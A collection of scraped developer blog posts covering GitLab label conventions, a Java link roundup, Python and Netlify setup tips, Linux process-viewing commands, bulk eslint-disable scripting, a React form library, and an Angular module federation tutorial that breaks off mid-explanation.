**Priority** labels define which change requests matter the most in terms of attention. To keep it simple, we have three different priorities: low, medium and high. *Low* change requests are the one we will eventually handle someday. *High* change requests on the other hand requires an immediate attention. Most of the change request are labelled as Medium.
**Piles** defines the current state of a change request. It is immediately related to the board feature of gitlab (more on this in our next installment covering the use of the development board).
We also recognize 4 different **types** of change requests: new features, small enhancements, bugs and questions. A new feature is an important change either in terms of amount of code required or changes in the user experience. A enhancement represents a small change or a minor improvement. We are talking about a bug when a functionality of the software does not work as expected. We apply the question label when the request does not imply a change in the functionalities of the software.
Label categories is not a feature provided by Gitlab out of the box. The good news is that you can name your label exactly the way you want. Practically speaking, we define a label category by using a common prefix to all labels belonging to the same category. Prefix are separated from the label name by a colon. The label itself is written in capital letters.

*Example: priority labels*
Try to choose a short but meaningful name for the prefix in order to avoid having long name for labels. For instance, we use the `pri:` prefix for priority. So we have the following labels defined for priority: `pri:HIGH`, `pri:MEDIUM`, `pri:LOW`. We are using the `type:` prefix for type label category, which includes `type:ADD` for new features, `type:ENH` for enhancements, `type:BUG` and `type:QUE` for questions. We are using `pile:` , well… for the pile one, `vel:` for velocity and `env:` for environment, etc
## When to use label categories?
Label categories are useful when one
* defines a new change request,
* review an existing change request
* search for specific change requests
When **adding a new change request** to a project's issue tracker, label categories help us improve the definition of the change request. As mentioned above, we have a total of 5 different categories, we want one and only one label of each category to be added to the change request as a kind of meta-data. It means that for each change request, we have to specify its priority, its type, its velocity, its state and the impacted environment. Note that the pile remains undefined. It will be used when the change request are sorted.
Because Gitlab issue tracker is both powerful and flexible, we can easily implement this "one label mandatory per category" rule. Unfortunately, and to the best of our knowledge, we have no way to make this rule mandatory. In the end, it is really a matter of internal process and self discipline.
Using label categories will also force you to use the same scheme everywhere. If like us, you deal with several projects, always using the label categories scheme helps us define efficient habits. Adding a new change request? Done with its description? Specify its type, pri, env, vel and you are good to go.
When **reviewing a change request**, the meta-data and the pile helps us understand almost immediately what kind of change request we are looking at. That's another added value of using label categories. Take the below example:

*A properly defined change request*
Just by looking at the above list of labels, you know the change request is a bug (type) severely impacting (priority) the production environment (environment). The fix for that bug is estimated to be an easy one (velocity) and is currently ready to be tested (pile). By always using the same categories and labels, we create a habit for both our customers and for us.
The latest advantage of using label categories is when **searching for change requests**. Here are few examples, using the search bar of the issue list:
* Wanna know which change requests requires your immediate attention? Go to the Issue list and use the following filters: `type:BUG`, `env:PROD`, `pri:HIGH` …
* Your customers is running out of budget and want a release with quick wins (also known as cheap change requests with great benefits)? Use the following filter: `type:ENH`, `type:ADD`, `vel:1`, `vel:2`
* etc

*Issue list filtered for urgent matters*
## Make use of group labels
If you have several projects hosted under a single instance of Gitlab CE, we strongly advice you to use the [project groups](https://docs.gitlab.com/ce/user/group). Project groups can be seen as a common namespace for projects and team members. Among other things, this feature allows you to group projects (obviously), deal with users access, have a consolidated view on the activities, merge requests and issues.
By default, each project has its own set of labels. If you have several projects, you have to define labels within each projects. This can be a cumbersome and prone to error task and a waste of time, particularly if you use the same set of labels among the different projects. For instance, we, at i-Logs, have a default set of 24 labels (see above) and currently around 20 active projects. Do the maths and you'll get the picture.
> *Defined once, used everywhere*
One of the convenient thing with project groups is that it allows you to define group labels which are then automatically available in each project belonging to the group.
To define a label at the group level:
1. select group from the top level menu;
1. select a group;
1. on the left side menu, select the Issue entry and the Label entry;
1. from the empty list, click the create label at the top right corner of the screen.
If you already have a label created at the project level, you should be familiar with the group *New Label* form as they are identical.
The first advantage of a group label is that it is automatically available in all child projects. Time saved !

*Group labels in a project label list*
This is not the only advantage. Within a project, you can use a group label exactly like a label created directly in the project. But there is more: you can use the group label on the group consolidated information. For instance, you can filter the consolidated list of issues in a group of projects with one or more group labels. Also you can subscribe to a group label to receive a email notification when a new change request is added to the Issue list of each project belonging to the group. Imagine having four projects in a group and the `type:BUG` label defined at the group level. If you subscribe to that label, you'll receive a notification email for each bug defined in any of the four projects.
To receive notifications for a specific label, simply go to the list of labels and click on the *subscribe* button to the right of the corresponding label. This is valid for both group and project labels.
A few words of advice on project groups:
* you should carefully think about your global projects organization before starting because although Gitlab makes it possible to move groups and/or projects, it can have unwanted side effects.
* Choose your label names carefully. At the project level, Gitlab does not let you create two labels with the same name. Nevertheless, you can create at the group level a label having the same name than an existing label at the project level. You'll end up with duplicate label names in that project and it can lead to confusion.
## Use Star labels
In each project, from the label list view (Issues -> Label), you can star one or more existing labels. Star a label to make it a priority label. From the prioritized labels list, it is possible to order the labels to change their relative priority.

*Priority labels are stars!*
At i-Logs, we star all the labels from the pri: (priority) category. Once stared, we order the labels from HIGH to LOW. This little trick is very convenient when using the issue list by ordering the list by priority.

*Order the change request list by priority*
Please note that although it is possible, in a project label list, to star a label defined at the group level, as the time of writing this post, it is not (yet?) possible to star a label at the group level.
That's it for today. I really do hope you have learn something interesting. If you have some gitlab magic tips to share, do not hesitate to comment below! I'll be glad to here from you. For my part, I'll be back shortly with another post covering how we deal on a daily basis with the issue board. Stay tuned !
| gwelr |
398,534 | Wednesday Links - Edition 2020-07-15 | First milestone of Reactor 2020.0 -Codename Europium ( 5 min read ) ☢️ https://spring.io/blog/2020/07... | 6,965 | 2020-07-15T10:06:06 | https://dev.to/0xkkocel/wednesday-links-edition-2020-07-15-5gcd | java, spring, jvm, maven | First milestone of Reactor 2020.0 -Codename Europium ( 5 min read ) ☢️
https://spring.io/blog/2020/07/10/first-milestone-of-reactor-2020-0-codename-europium
The Spring team wants to hear from you! ( 40 sec read ) 🎤
https://spring.io/blog/2020/07/14/the-spring-team-wants-to-hear-from-you
APM headers in Kafka records ( 20 sec read ) 🐦
https://twitter.com/criccomini/status/1281632338128932864
Quick tip: ISO 8601 durations in Java ( 1 min read ) ⌛
https://www.mscharhag.com/java/iso8601-durations
Generating UUIDs at scale on the Web ( 12 min read ) 🆔
https://medium.com/teads-engineering/generating-uuids-at-scale-on-the-web-2877f529d2a2
Java Agent - Bond or Smith? ( 7 min read ) 🕵️
https://zserge.com/posts/javaagent/
ZGC and Using -XX:SoftMaxHeapSize ( 4 min read ) 🥞
https://malloc.se/blog/zgc-softmaxheapsize
Trying Rootless Docker with Testcontainers ( 8 min read ) 🛳️
https://bsideup.github.io/posts/rootless_docker/
Reposilite - Lightweight repository manager for Maven artifacts ( 30 sec read ) 📦
https://reposilite.com/
The Concept of Domain-Driven Design Explained ( 8 min read ) 🏢
https://dev.to/microtica/the-concept-of-domain-driven-design-explained-1ccn
What is difference between Heap and Stack Memory in Java JVM ( 6 min read ) 🧠
https://www.java67.com/2016/10/difference-between-heap-and-stack-memory-in-java-JVM.html
How to track and display profile views on GitHub ( 3 min read ) 🏷️
https://rushter.com/blog/github-profile-markdown/
Building stackoverflow-cli with Java 11, Micronaut, Picocli, and GraalVM ( 14 min read ) 📺
https://e.printstacktrace.blog/building-stackoverflow-cli-with-java-11-micronaut-picocli-and-graalvm/
| 0xkkocel |
399,506 | Starting a Python project | $ mkdir ~/my_project Create project directory under user home. $ cd ~/my_project $ git init Create... | 0 | 2020-07-16T01:07:13 | https://dev.to/kennethloh/starting-a-python-project-3eb5 | 1. `$ mkdir ~/my_project` Create project directory under user home.
2. `$ cd ~/my_project`
3. `$ git init` Create git repo.
4. `$ python -m venv venv` Create virtual environment within the project directory. Preferred over a centralised virtual environments directory e.g. `my_venvs/my_project` as it is easier to find and manage. Not a hidden directory e.g. `.venv` for visibility.
5. `$ source venv/bin/activate`
5a. `$ source venv/Scripts/activate` for Python 3.9+
6. `$ pip install pip --upgrade` Because for some reason the virtual environment's pip is an older version?! Hints of Python dependency hell emerging. | kennethloh | |
403,126 | TypeScript and Netlify Functions | Did you know that Netlify Functions are just using AWS Lambdas behind the scenes? This means you can... | 0 | 2020-07-18T13:25:17 | https://chiubaca.com/typescript-and-netlify-functions-37b8 | typescript, netlify, serverless | Did you know that Netlify Functions are just using AWS Lambdas behind the scenes?
This means you can use the same type definitions available for aws-lambda for your Netlify functions too. Install the aws-lamda types by running the following.
```bash
npm install @types/aws-lambda --save-dev
```
You only need to import the `APIGatewayProxyEvent`, `APIGatewayProxyCallback` types like so.
```ts
import { APIGatewayProxyEvent, APIGatewayProxyCallback } from "aws-lambda";
export const handler = async function (
event: APIGatewayProxyEvent,
context: any,
callback: APIGatewayProxyCallback
) {
// Do some stuff here
};
```
Note, there are no type declarations available for `context` as this includes properties and methods specific to Netlify such as [Netlify Identity](https://docs.netlify.com/functions/functions-and-identity/#access-identity-info-via-clientcontext) .
However, having auto completion for `event` alone makes this hugely useful!
I'm putting together some TypeScript Netlify Functions examples over at this [repo](https://github.com/chiubaca/typescript-netlify-functions-starter). Feel free to give it a star if you find it helpful. | chiubaca |
403,332 | Animatronics with Artificial Intelligence — Brings Unimaginable Results | Have you ever heard of Animatronics? It is the integration of Animation and Electronics. Imagine what... | 0 | 2020-07-18T18:20:37 | https://dev.to/ritheeshbaradwaj/animatronics-with-artificial-intelligence-brings-unimaginable-results-1b70 | machinelearning, writing | Have you ever heard of Animatronics? It is the integration of Animation and Electronics. Imagine what wonders we could achieve with Artificial Intelligence with Animatronics working together. Here's an article that gives a gist of the possibilities we can have access to in case we use it with AI. Hope you enjoy it!
https://towardsdatascience.com/animatronics-with-artificial-intelligence-brings-unimaginable-results-407983acf39 | ritheeshbaradwaj |
421,321 | All about processes and how can we view them | Linux is a multitasking operating system, which means that it creates an illusion that multiple progr... | 6,412 | 2020-08-08T12:22:03 | https://dev.to/yashsugandh/all-about-processes-and-how-can-we-view-them-1n2i | ubuntu, linux, computerscience, beginners | Linux is a multitasking operating system, which means that it creates an illusion that multiple programs are running at the same time by rapidly switching from one program to another.
The Linux kernel manages this through the use of processes.
Each process has the illusion that it is the only process on the computer. The tasks share common processing resources (like CPU and memory).
What exactly is a process?
An instance of a program is called a Process. A process can be simply called as a program in execution.
Every time we run a shell command, a program is run and a process is created for it.
Each process in Linux is assigned an ID called process id (PID).
There are two types of processes :
1. Foreground Processes
The foreground processes are those which can be seen on UI and require some sort of user input.
For example, a text editor.
2. Background Processes
The background processes are those which do not require any form of input from the user and run automatically in the background.
For example, an antivirus.
There are different state of a process:
1. Running - The state where a process is either in running or ready to run(waiting for CPU time).
2. Interruptible - A blocked state of a process that waits for an event or a signal from another process.
3. Uninterruptible - The process is forced to halt for certain conditions that a hardware status waits and a signal could not be handled.
It is also known as a blocked state.
4. Stopped - Once the process is completed, this state occurs. This process can be restarted.
5. Zombie - In this state, the process will be terminated and the information will still be available in the process table. We get a Zombie process when a parent process dies before child.
The first process that starts when a Linux system boots up is the **init process**.
The kernel looks for **init** in `/etc`. If the kernel can't find **init**, it tries to run `/bin/sh`, and if that also fails, the startup of the system fails.
The **PID** we find out about above is assigned to a process when it is created and since the init is the first process after the Linux system boots up the PID of init is **1**.
Till now we have seen what process is and how it works. Now let's look at how to view the processes that are running in our system.
**1. `pidof` command**
The `pidof` command is used to find the process id's of a running application.

To get the PID of a process we just use `pidof` along with the application name.

In the above example, we used the command `pidof init` which we know should return **1** and it did.
We also tried `pidof java` which returned multiple processes running for java.
**2. `ps` command**
The `ps` command returns the snapshot of the current processes.

In the above example, the `ps` command by default shows us all the processes that are associated with the current terminal.
TTY is short for “teletype,” and refers to the controlling terminal for the process.
Unix is showing its age here. The TIME field is the amount of CPU time consumed by the process.
To get the list of all the processes running we use the `ps` command along with two options `e` which specifies all processes and `f` which specifies full description.

In the above example, we used the command `ps -ef` to get the details of all the processes running.
What if we wanted to find a process id of a specific process?
- find the PID of firefox application

In the above example, we used the command `ps -ef | grep firefox` to get processes running for firefox so that we can get the PID of firefox.
But, what if I tell that there is a way through which we won't need to write such long command?
**3. `pgrep` command**
The `pgrep` command is used to get the process id of an application.
It is similar to the `pidof` command is much more powerful as we do not need to provide the exact name of the application.

In the above example, we tried to find an application that has "idea" in its path.
When we tried it with `pidof` we got no response but when we tried the same with `pgrep` we got the PID.
**4. `top` command**
This utility tells the user about all the running processes on the Linux machine(It refreshes the data every 3 seconds by default).
The name top comes from the fact that the top program is used to see the “top” processes on the system.

In the above example, we can see the following
| Field | Description |
|--------- |--------------------------------------------- |
| PID | The process ID of each task |
| User | The username of task owner |
| PR | Priority Can be 20(highest) or -20(lowest) |
| NI | The nice value of a task |
| VIRT | Virtual memory used (kb) |
| RES | Physical memory used (kb) |
| SHR | Shared memory used (kb) |
| %CPU | % of CPU time |
| %MEM | Physical memory used |
| TIME+ | Total CPU time |
| Command | Command Name |
| | |
These were the tools we can use to view the processes. Please let me know if I missed something.
In the next post, we will discuss various ways to control processes. See you in the funny papers.
| yashsugandh |
696,340 | Adicionando eslint-disable nos arquivos com erros | Recentemente eu precisei atualizar um projeto em Ember que estava na versão 3.6 (bem desatualizado)... | 0 | 2021-05-12T18:56:45 | https://eduardoweiland.info/posts/2021/05/adicionando-eslint-disable-nos-arquivos-com-erros/ | braziliandevs, eslint, javascript | ---
title: Adicionando eslint-disable nos arquivos com erros
published: true
date: 2021-05-12 17:09:49 UTC
tags: [braziliandevs, eslint, javascript]
canonical_url: https://eduardoweiland.info/posts/2021/05/adicionando-eslint-disable-nos-arquivos-com-erros/
---
Recentemente eu precisei atualizar um projeto em Ember que estava na versão 3.6 (bem desatualizado) para a versão 3.24 (atual LTS). Para quem conhece o Ember, sabe que muita coisa mudou entre essas versões (Glimmer, classes nativas etc.). E, com as alterações, o Ember também atualizou o plugin para o ESLint, incluindo novas regras para identificar código antigo e reforçar as novas boas práticas.
Mas, mesmo com tantas alterações, quase todo o código antigo ainda segue funcionando (exceto onde APIs privadas eram utilizadas 🤷), graças ao [Semantic Versioning][]. Ele não *precisa* ser atualizado para a nova sintaxe por enquanto, isso só será necessário ao atualizar para o Ember 4.0, quando ele for lançado.
Só que agora o ESLint está acusando erros em quase todos os arquivos 😟!
O Ember fornece alguns [codemods][Ember Codemods] para ajudar a atualizar o código para a nova sintaxe. Mas o problema é que **nem tudo é atualizado**. Algumas alterações precisam ser feitas manualmente, o que não é uma solução muito viável quando existem 259 erros para serem corrigidos manualmente, mesmo depois de rodar o `eslint --fix` e os codemods 😱.
A solução: adicionar comentários `/* eslint-disable rule-name */` em todos os arquivos que estão com erros, especificando apenas as regras que estão sendo violadas naquele arquivo. Dessa forma, os arquivos antigos não irão acusar nenhum erro, mas todo código novo deverá passar no lint com as regras novas 👌.
Mas fazer isso manualmente ainda seria muito trabalhoso. Deve existir uma forma de automatizar isso 🤔...
Em primeiro lugar, eu precisava de um output do ESLint que fosse fácil de parsear em outras ferramentas. O formato padrão é bom para ser lido por humanos, mas não por máquias. Felizmente, o ESLint suporta [vários formatos diferentes][ESLint Formatters]. Eu optei por utilizar o formato `compact`, porque reporta cada erro em uma única linha, em um formato bem definido, de onde é fácil extrair as informações necessárias (caminho do arquivo e nome da regra).
Um exemplo de erro reportado no formato `compact`:
```
/home/eduardo/my-project/app/instance-initializers/global-loading-route.js: line 8, col 24, Error - Don't access `router:main` as it is a private API. Instead use the public 'router' service. (ember/no-private-routing-service)
```
É fácil de identificar que a linha começa com o caminho do arquivo, seguido por dois-pontos, números da linha e da coluna, nível e mensagem de erro, terminando com o nome da regra entre parênteses. Traduzindo isso para um `sed`:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p'
```
O resultado disso é uma lista mais "limpa", apenas com o caminho do arquivo e o nome da regra que falhou, separados por um tab. Como o mesmo erro pode ser reportado mais de uma vez no mesmo arquivo, é importante adicionar a dupla `sort | uniq`:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p' | sort | uniq
```
Só o que falta fazer agora é adicionar os comentários `/* eslint-disable */` em todos os arquivos. Eu poderia tentar agrupar todas as regras e colocar um único comentário no começo do arquivo, porém 1) o comentário poderia ultrapassar o limite de caracteres da linha e causar novos erros; 2) o ESLint permite vários comentários separados, não é necessário agrupar; e 3) é mais fácil adicionar um comentário por regra, a partir do formato de saída `compact`.
Para fazer isso, eu direcionei a saída do comando acima para um loop com `while read` e um sed para adicionar o comentário no começo do arquivo. O comando ficou assim:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p' \
| sort | uniq | while IFS=$'\t' read file rule ; do \
sed -i "1s;^;/* eslint-disable $rule */\n;" "$file" ; done
```
Nesse comando, o `IFS=$'\t'` serve para separar os campos no `read` apenas com o `tab` e não com espaços, então, mesmo se existir algum espaço no caminho do arquivo, ele será lido corretamente. O `read file rule` vai ler uma linha da entrada padrão (que é a saída do `uniq`), e colocar o nome do arquivo na variável `$file` e o nome da regra na variável `$rule`. Essas variáveis são, então, utilizadas no `sed`, que edita o arquivo inserindo uma nova linha com o comentário `/* eslint-disable $rule */`.
O resultado depois disso: zero falhas! 😎
[Semantic Versioning]: https://semver.org/
[Ember Codemods]: https://github.com/ember-codemods
[ESLint Formatters]: https://eslint.org/docs/user-guide/formatters/
| eduardoweiland |
429,425 | Last Form component you need | I have published my first NPM library for React Form, I have created this form component in my last 3... | 0 | 2020-08-16T19:45:46 | https://dev.to/gkhan205/published-first-npm-package-for-react-form-58eb | react, npm, showdev, codewithghazi | I have published my first NPM library for React Form, I have created this form component in my last 3 years of experience, have tested this component with more than 8 projects and found it very useful.
There were times when creating form layouts, handling validations, and creating data for API POST and populating form data from the server took a bit time to incorporate in the application. So with every project, I was working I improved this component and reached a level where I found this component very useful and saved lots of time in Form Development with all aspects I mentioned above.
I saved approximately a day work on working on forms with react apps.
After testing this component with my previous projects I though to create an npm library for this component so that it can be helpful to other developers too.
[Formify React](https://www.npmjs.com/package/formify-react)
Request you guys to use and give your feedback. Also star this repo [Formify React Github](https://github.com/gkhan205/formify-react)
[](https://codesandbox.io/s/formify-react-v9pkv?fontsize=14&hidenavigation=1&theme=dark) | gkhan205 |
492,181 | Why I Decided to Study Software Engineering | Why did I decide to learn software engineering? The short and cliche answer is: Balance. I consi... | 0 | 2020-10-19T18:47:12 | https://dev.to/nicklevenson/why-i-decided-to-study-software-engineering-40li | student, flatiron, codenewbie, career |
Why did I decide to learn software engineering? The short and cliche answer is:
*Balance*.

I consider myself to have a creative heart. Since I was little I have loved project oriented hobbies. As a kid I was obsessed with medieval weaponry, trying to build a trebuchet or crossbow out of household items. Running the constant risk of getting parentally scolded, I frequently took apart my RC cars that I had just got for my birthdays, just to try to put it back together. This habit usually ended with a non-functional piece of junk, but I loved the way it felt when I got something to work.
As I got older, my creative energy shifted from mechanical to more artistic and expressive. I learned to play and record music, which is still one of my favorite ways to spend time. Similar to building household gizmos as a kid, finishing a song and having people listen and enjoy gives me an immense feeling of accomplishment, satisfaction, and fulfillment. I made this, and it's mine. While attending college I studied film, philosophy, and music. After graduating I worked in television, but I found the work to be less fulfilling and less creative as I had expected in school. It was an exciting industry to be a part of, but I couldn't shake the feeling that something was missing. Then, the COVID pandemic hit, the industry was on pause, and I had a moment to sit back and reevaluate my life's direction.
*I looked to the things I loved and extracted the qualities that made them lovable.*
Film and music were expressive and more abstract, while philosophy was logical. With time to reflect, I realized that I needed a career that was creative and that *balanced* my logical and abstract qualities. I had taken a couple coding classes in college and was always interested in learning more. So during the start of the pandemic I decided to learn on my own. As it turned out, programming was exactly what I was looking for. It felt like a perfect *balance* of problem solving and abstract creative thinking. Couple that with intense feelings of euphoria during those 'aha' moments in figuring something out and making something work, I knew programming was something I had to pursue seriously. A few months later and I find myself beginning Flatiron School's full time software engineering program. I know this journey will be extremely challenging, but I am beyond excited to delve into the world and career of programming.
| nicklevenson |
603,410 | Daily Developer Jokes - Sunday, Feb 14, 2021 | Check out today's daily developer joke! (a project by Fred Adams at xtrp.io) | 4,070 | 2021-02-14T13:00:23 | https://dev.to/dailydeveloperjokes/daily-developer-jokes-sunday-feb-14-2021-9b3 | jokes, dailydeveloperjokes | ---
title: "Daily Developer Jokes - Sunday, Feb 14, 2021"
description: "Check out today's daily developer joke! (a project by Fred Adams at xtrp.io)"
series: "Daily Developer Jokes"
cover_image: "https://private.xtrp.io/projects/DailyDeveloperJokes/thumbnail_generator/?date=Sunday%2C%20Feb%2014%2C%202021"
published: true
tags: #jokes, #dailydeveloperjokes
---
Generated by Daily Developer Jokes, a project by [Fred Adams](https://xtrp.io/) ([@xtrp](https://dev.to/xtrp) on DEV)
___Read about Daily Developer Jokes on [this blog post](https://xtrp.io/blog/2020/01/12/daily-jokes-bot-release/), and check out the [Daily Developer Jokes Website](https://dailydeveloperjokes.github.io/).___
### Today's Joke is...

---
*Have a joke idea for a future post? Email ___[xtrp@xtrp.io](mailto:xtrp@xtrp.io)___ with your suggestions!*
*This joke comes from [Dad-Jokes GitHub Repo by Wes Bos](https://github.com/wesbos/dad-jokes) (thank you!), whose owner has given me permission to use this joke with credit.*
<!--
Joke text:
___Q:___ Why couldn't the React component understand the joke?
___A:___ Because it didn't get the context.
-->
| dailydeveloperjokes |
641,426 | How do I become a DevOps engineer? | A question I hear a lot is “How do I become a DevOps engineer?” I have two answers to this... | 0 | 2021-03-22T09:27:33 | https://jhall.io/archive/2021/03/21/how-do-i-become-a-devops-engineer/ | devops | ---
title: How do I become a DevOps engineer?
published: true
date: 2021-03-21 00:00:00 UTC
tags: devops
canonical_url: https://jhall.io/archive/2021/03/21/how-do-i-become-a-devops-engineer/
---
A question I hear a lot is “How do I become a DevOps engineer?”
I have two answers to this question.
The first probably isn’t very satisfying:
**“DevOps Engineer” is an oxymoron.**
DevOps, as a philosophy, is the idea that Development and Operations should work together, in [cooperation](https://jhall.io/archive/2021/02/11/devops-is-just-cooperation/).
My second answer addresses what I expect most people mean by the question: How can a developer adopt a more DevOps mindset, and possibly even move into operations?
The shortest answer I can offer to this question is: **Learn to ship your own code.**
To elaborate a bit on that: “DevOps” is about the full application lifecycle, so if you want to improve your DevOps skills, learn to operate in all stages of that lifecycle, not just coding. That means learning to ship your own code, learning to deploy your own code, learning to monitor your own code. | jhall |
660,872 | How to Create Subscribe Call to action Form | For the last few days, I've been working on a Some Design parts. I've always believed that a creativi... | 0 | 2021-04-10T06:12:22 | https://dev.to/itanand/how-to-create-subscribe-call-to-action-form-4pim | codepen | For the last few days, I've been working on a Some Design parts. I've always believed that a creativity is important for any dev since it connects you to future opportunities and it helps you to grow your network.
Today I create a Subscribe call to action design using pug, SCSS, and JavaScript (Babel). There's still some stuff to improve, like making more creative, tweaking some UX, etc. So it's still a WIP, for sure. But hey, everyone has to start somewhere, right?
I tried Code Pen to write my codes there. What is Code-Pen? Code-Pen is a social development environment for front-end designers and developers. This is basically help you to Build and deploy a website, Show off your works and build test cases to learn and many mores. If you want to Know more about Code-Pen visit Codepen.io for more information.
Let's Start the todays hot topic "How to create subscribe Call to action page". I have share the link of my code, You can go with the link ant get the source code.
I use Html, SCSS, and JavaScript(Babel) to create this design.
https://codepen.io/itanand/pen/dyNJRva | itanand |
704,282 | Angular dynamic modules at runtime with Module Federation | Angular 12 recently launched with the added enhancements of Webpack 5 and opening the door to using m... | 0 | 2021-05-20T21:54:34 | https://dev.to/seanperkins/angular-dynamic-modules-at-runtime-with-module-federation-mk5 | angular, webpack, modulefederation, microfrontend | Angular 12 recently launched with the added enhancements of Webpack 5 and opening the door to using module federation. If you are looking for a great deep-dive into module federation and micro-frontends, I suggest reading: https://www.angulararchitects.io/aktuelles/the-microfrontend-revolution-module-federation-in-webpack-5/.
## Micro frontends
Micro frontends and more importantly module federation, allows developers the flexibility of remotely requesting a module on the network and bootstrapping that module into their application. Similar to lazy-loading, remotely loading modules can greatly reduce the bundle size of your application and the network cost to loading modules that end up unused by your users.
There's other benefits to micro-frontends, including:
- A/B serving features
- Incremental updates
- Independent versioning of features
- Dynamic feature resolutions
---
## Getting started
The Angular Architects package `@angular-architects/module-federation` creates a simple API to request modules and pull them into your application.
Assuming an NX mono-repo set-up:
To add module federation to your workspace, run:
```
nx add @angular-architects/module-federation@next
```
This will install the necessary dependency, with the schematics needed to add remote apps to be consumed by module federation.
Let's assume you have the following mono-repo:
```
apps/
shell/
remote/
```
**Shell** is your consuming application. It is the highest container, responsible for what pieces are pulled in and the composition of features.
**Remote** is the feature set, isolated and decoupled to be pulled in on-demand, by the shell.
To make these apps compatible with module federation, you will need to run the schematic on their projects:
```
nx add @angular-architects/module-federation --project shell --port 5000
nx add @angular-architects/module-federation --project remote --port 6000
```
You can configure the port to be whatever you desire. This only matters for local development.
This schematic will:
- Generate a `webpack.config.js` and `webpack.config.prod.js` with a boilerplate for module federation
- Update `angular.json` for the project definition, to reference the `extraWebpackConfig` and update the project's port to the value specified
- Split the bootstrap logic of your app from `main.ts` to `bootstrap.ts` and reference the function in `main.ts`.
### Module Federation Plugin
Inside your `webpack.config.js` you will want to get accommodated with the config for module federation.
```js
module.exports = {
output: {
uniqueName: 'remote',
publicPath: 'auto',
},
optimization: {
runtimeChunk: false,
},
resolve: {
alias: {
...sharedMappings.getAliases(),
},
},
plugins: [
new ModuleFederationPlugin({
name: 'remote',
filename: 'remoteEntry.js',
exposes: {
'./Module':
'./apps/remote/src/app/app.module.ts',
},
shared: {
'@angular/core': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/common': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/common/http': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/router': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
...sharedMappings.getDescriptors(),
},
}),
sharedMappings.getPlugin(),
],
};
```
- `name` should align with your `output.uniqueName` and match your shell app's webpack config for the remotes section.
- `fileName` is the name of the generated file's entry point to your remote module. This file name will not be renamed in the build process and is the asset you will be referencing in your shell to request the module.
- `exposes` is the named paths to modules, components, etc. that you want to make accessible to the shell to pull in. I'll explain this further below.
- `shared` the shared dependencies (and rules) between your remote and shell app. This allows tight control for your remote to not re-declare modules/services that you expect to be singleton, or prevent mismatched versions of Angular or other libraries existing in the eco-system. By assigning `strictVersion` to `true`, the build will quick fail if an issue occurs. Removing this option will potentially pass the build, but display warnings in the dev console.
You can now locally run your shell and remote with:
```
nx serve shell -o
nx serve remote -o
```
> `-o` will automatically launch the apps in your default browser
### Exposes (continued)
While the example schematic will generate the `exposes` section with the `AppModule` and `AppComponent` I would **strongly** advise against this.
When serving the remote and shell to develop locally, the sites will be deployed to:
- localhost:5000
- localhost:6000
When you make changes to the `remote` app folder's contents, only `localhost:6000` will live-reload.
This means for local development, consuming the remote into the shell app is not sustainable for development against remote-specific functionality.
So what do I propose?
The `AppModule` of your remote app should be your "demo" or self-deployed landscape. You will import modules and providers to establish a foundation to locally test your remote app in isolation. The `AppModule` should have a separate module of the cohesive functionality you are wanting to expose, i.e: `LoginModule`.
With this approach, exposing and pulling in `AppModule` has the potential to pulling in duplicate root providers; as well as pulling duplicate assets and styles.
Instead with:
```
exposes: {
'./Module':
'./apps/remote/src/app/login/login.module.ts',
},
```
> `./Module` is nomenclature you can define as you please. I would recommend being more specific in a diverse system.
The shell app still can access the shared functionality to pull in, but doesn't pull in more than it needs to.
I can locally develop on `localhost:6000`, having an accurate test bed for my application and live-dev against the changes with ease.
Now that the foundation of module federation have been set, let's jump into dynamically swapping modules at runtime.
---
## Dynamic Runtime modules
All of the top resources available for module federation show statically referencing the modules in your shell app's route definition.
```ts
import { loadRemoteModule } from '@angular-architects/module-federation';
[...]
const routes: Routes = [
[...]
{
path: 'flights',
loadChildren: () =>
loadRemoteModule({
remoteEntry: 'http://localhost:3000/remoteEntry.js',
remoteName: 'mfe1',
exposedModule: './Module'
})
.then(m => m.FlightsModule)
},
[...]
];
```
This serves a purpose when your application wants to independently build and manage known features. This doesn't however allow you conditionally serve features or create an application that does not have context of what features exist at build time.

### Dynamic module federation
Dynamic module federation attempts to resolve this by allowing you independently request modules before bootstrapping Angular:
```ts
import { loadRemoteEntry } from '@angular-architects/module-federation';
Promise.all([
loadRemoteEntry('http://localhost:3000/remoteEntry.js', 'mfe1')
])
.catch(err => console.error('Error loading remote entries', err))
.then(() => import('./bootstrap'))
.catch(err => console.error(err));
```

Better... but still has a few drawbacks:
- What if my remote module is routable? Will it recognize the route when I navigate directly to it?
- How does this impact lazy loading?
- Remote entries are still hard-coded
### Dynamic runtime module federation
We need the ability to have a decoupled shell, that can dynamically request federated modules at runtime.
#### A real use case?
On our team, we want to dynamically serve separate authentication experiences for customers. Some customers use our platform's stock username/password authentication. Others have their own corporate SSO. All of them have strict branding standards that aren't compatible with each other.
We do however, want all customers to share the primary functionality of our platform - content management and learning delivery. Once they login to the application, they only need branding for their corporate logo and primary brand color; they can use all the existing interfaces.

#### Less rigid example?
Feature toggles in an application. Some customers have "X" others have "Y". You want to serve one app that can respond to "X" and "Y".
#### Getting started
Authentication deals with routing and we need to allow our users to navigate to `/authentication/login` and get served the correct federated module for their company.
We will be using an injection token to store our route definitions as they relate to module federation.
```ts
export const PLATFORM_ROUTES = new InjectionToken<Routes>('Platform routes for module federation');
```
If you used the the schematic discussed above, you should have a `bootstrap.ts` file. Prior to bootstrapping Angular, we need to request the registry of the modules that should exist for this user. This can be any network call, for this demo we will use a local JSON asset called `platform-config.json`
Platform config is going to describe all the modules, the location of the modules, the module name to bootstrap and the route to register in the shell app for the remote module.
```
{
"authentication": {
"path": "authentication",
"remoteEntry": "http://localhost:5001/remoteEntry.js",
"remoteName": "coreAuthentication",
"exposedModule": "./LoginModule",
"exposedModuleName": "LoginModule"
}
}
```
- `path` is the Angular route namespace to load the remote module under.
- `remoteEntry` is the served location of your remote module. This would be replaced with the served location (CDN, CloudFoundry, S3 asset, etc.) in a built environment. This currently references where we will be serving our Angular apps for local development.
- `exposedModule` is the key in your remote app's `webpack.config.js` for the exposed module (your nomenclature)
- `exposedModuleName` is the name of the Angular module that was exposed, this is leveraged for lazy loading.
